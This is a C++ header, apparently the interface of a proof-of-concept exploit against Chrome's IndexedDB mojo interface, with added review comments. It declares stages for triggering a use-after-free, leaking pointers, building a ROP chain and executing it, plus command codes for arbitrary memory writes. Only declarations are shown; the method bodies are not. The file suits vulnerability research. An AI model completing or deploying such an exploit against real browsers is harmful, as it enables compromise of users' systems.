#ifndef CONTENT_EXPLOIT_H_
#define CONTENT_EXPLOIT_H_
#include "third_party/blink/renderer/modules/indexeddb/web_idb_factory_impl.h"
#include "third_party/blink/renderer/modules/indexeddb/web_idb_database_impl.h"
// C-linkage entry point. `extern "C"` only affects linkage: the symbol is
// exported under the unmangled name "exploit" (presumably so it can be
// resolved by name from outside this TU -- confirm against the caller), while
// the std::string parameter is still passed with ordinary C++ semantics.
extern "C" void exploit(std::string);
// Declares the object that drives the IndexedDB (mojom) proof-of-concept in
// this translation unit. Only the interface is declared here; every method
// body, including the transitions between the Step values below, lives in the
// accompanying .cc and is not visible from this header.
//
// NOTE(review): the header is not self-contained -- std::string, std::vector
// and uint64_t are used without <string>, <vector> or <cstdint>, so it relies
// on those arriving transitively through the two Blink headers above.
class Exploit {
public:
Exploit();
~Exploit();
// NOTE(review): no copy/move operations are declared. The mojo *Ptr /
// *AssociatedPtr members are move-only by their type names, which would make
// the class implicitly non-copyable; confirm that is the intent.
// Entry point; presumably advances step_ from NOT_STARTED -- confirm in .cc.
void Start();
// Takes a string from the renderer side (same parameter type as the
// extern "C" exploit() hook declared above); semantics are defined in the .cc.
void RendererHook(std::string);
// Opens a database at |version|. The AssociatedPtr* is presumably an
// out-parameter for the resulting transaction -- confirm in .cc.
void OpenDatabase(int version,
blink::mojom::blink::IDBTransactionAssociatedPtr *,
int transaction);
void DatabaseIsClean();
// Mojo-style callbacks: each receives a database handle by value (PtrInfo).
// By their names they store it into freedb_/reusedb_/vtabledb_/ropdb_
// respectively -- verify against the definitions.
void CallbackUpgradeNeeded(
blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void OpenNewDatabases();
void
CallbackSuccess(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void SetReuseDb(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void SetVTableDb(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
// Stage methods; the order they run in is fixed by the .cc, not by this
// declaration order.
void UseAfter();
void TriggerBug();
void LeakData();
void LeakBeforeStep2();
void Step2();
void CleanupDb();
void SaveDb(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void Rop();
void SetRopDb(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void ExecRop();
// Inline setters: store the raw value as given, with no validation.
void leaked_ptr(unsigned long long p) { leaked_ptr_ = p; }
void vtable_ptr(unsigned long long p) { vtable_ptr_ = p; }
void slack_ptr(unsigned long long p) { slack_ptr_ = p; }
private:
// Command codes; INVALID is the trailing sentinel. Where they are decoded is
// not visible here (presumably from renderer_ops_ -- confirm in .cc).
enum Cmd {
CMD_SET_ROP_START,
CMD_SET_OFFSET_VTABLE,
CMD_WRITE8,
CMD_WRITE8_CHROME_BASE_PLUS_VALUE,
CMD_WRITE8_SLACK_BASE_PLUS_VALUE,
CMD_WRITE8_SLACK_BASE_ALIGNED,
CMD_START,
INVALID,
};
// Stages tracked in step_. Listed in the order declared; the actual
// transition logic is in the .cc.
enum Step {
NOT_STARTED,
CREATING_DB,
COMMITING_DB,
OPEN_DBS,
ABORT_TRANSACTIONS,
USE_AFTER_FREE
};
// Current stage. NOTE(review): no in-class initializer -- assumed to be set
// in Exploit(); confirm.
Step step_;
// Failure flag. NOTE(review): likewise has no in-class initializer.
bool failed_;
// Mojo interface handles (per the *Ptr / *AssociatedPtr type names): one
// factory, plus a database/transaction pair for each named database below.
blink::mojom::blink::IDBFactoryPtr idb_factory_;
blink::mojom::blink::IDBTransactionAssociatedPtr create_db_req_;
blink::mojom::blink::IDBDatabaseAssociatedPtr freedb_;
blink::mojom::blink::IDBDatabaseAssociatedPtr reusedb_;
blink::mojom::blink::IDBTransactionAssociatedPtr reusedb_req_;
blink::mojom::blink::IDBDatabaseAssociatedPtr vtabledb_;
blink::mojom::blink::IDBTransactionAssociatedPtr vtabledb_req_;
blink::mojom::blink::IDBDatabaseAssociatedPtr ropdb_;
blink::mojom::blink::IDBTransactionAssociatedPtr ropdb_req_;
// Database names, held as Blink's WTF::String.
WTF::String db_name_;
WTF::String db_reuse_name_;
WTF::String db_vtable_name_;
WTF::String db_rop_name_;
// Raw addresses/offsets. Only leaked_ptr_, vtable_ptr_ and slack_ptr_ have
// public setters above; the others are presumably filled in by the .cc.
// NOTE(review): uint64_t would be consistent with renderer_ops_ below.
unsigned long long offset_vtable_;
unsigned long long rop_start_addr_;
unsigned long long leaked_ptr_;
unsigned long long vtable_ptr_;
unsigned long long slack_ptr_;
unsigned long long chrome_base_;
// Database handles kept alive by the object; by its name SaveDb() appends
// here -- confirm in .cc.
std::vector<blink::mojom::blink::IDBDatabaseAssociatedPtr> dbs_saved_;
// Sequences of uint64_t operations; presumably each inner vector starts with
// a Cmd code -- confirm in .cc.
std::vector<std::vector<uint64_t>> renderer_ops_;
};
#endif